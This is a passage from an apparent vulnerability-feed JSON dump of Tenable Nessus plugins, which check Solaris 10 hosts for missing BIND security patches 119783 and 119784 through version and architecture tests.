value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-43\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-43\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-43\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-14T12:48:58", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 3, "cvss3": {}, "published": "2020-07-14T00:00:00", "title": "Solaris 10 (x86) : 119784-45", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2020-07-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-45.NASL", "href": "https://www.tenable.com/plugins/nessus/138427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138427);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-45\");\n script_summary(english:\"Check for patch 119784-45\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is missing Sun Security Patch number 119784-45\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-45\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-45 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-45\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-45\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-45\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T05:31:16", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 2, "cvss3": {}, "published": "2020-09-08T00:00:00", "title": "Solaris 10 (sparc) : 119783-46", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2020-09-08T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119783", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119783-46.NASL", "href": "https://www.tenable.com/plugins/nessus/140363", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140363);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/10\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (sparc) : 119783-46\");\n script_summary(english:\"Check for patch 119783-46\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is missing Sun Security Patch number 119783-46\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119783-46\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119783-46 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119783\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-46\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-46\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-46\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:24", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119783-31", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119783", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119783-31.NASL", "href": "https://www.tenable.com/plugins/nessus/107335", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107335);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (sparc) : 119783-31\");\n script_summary(english:\"Check for patch 119783-31\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119783-31\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119783-31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119783-31 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119783\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-31\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-31\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-31\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:24", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119783-25", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119783", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119783-25.NASL", "href": "https://www.tenable.com/plugins/nessus/107332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107332);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (sparc) : 119783-25\");\n script_summary(english:\"Check for patch 119783-25\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119783-25\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119783-25\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119783-25 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119783\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-25\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-25\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-25\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:38", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119784-39", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-39.NASL", "href": "https://www.tenable.com/plugins/nessus/107844", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107844);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-39\");\n script_summary(english:\"Check for patch 119784-39\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119784-39\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-39\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-39 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = 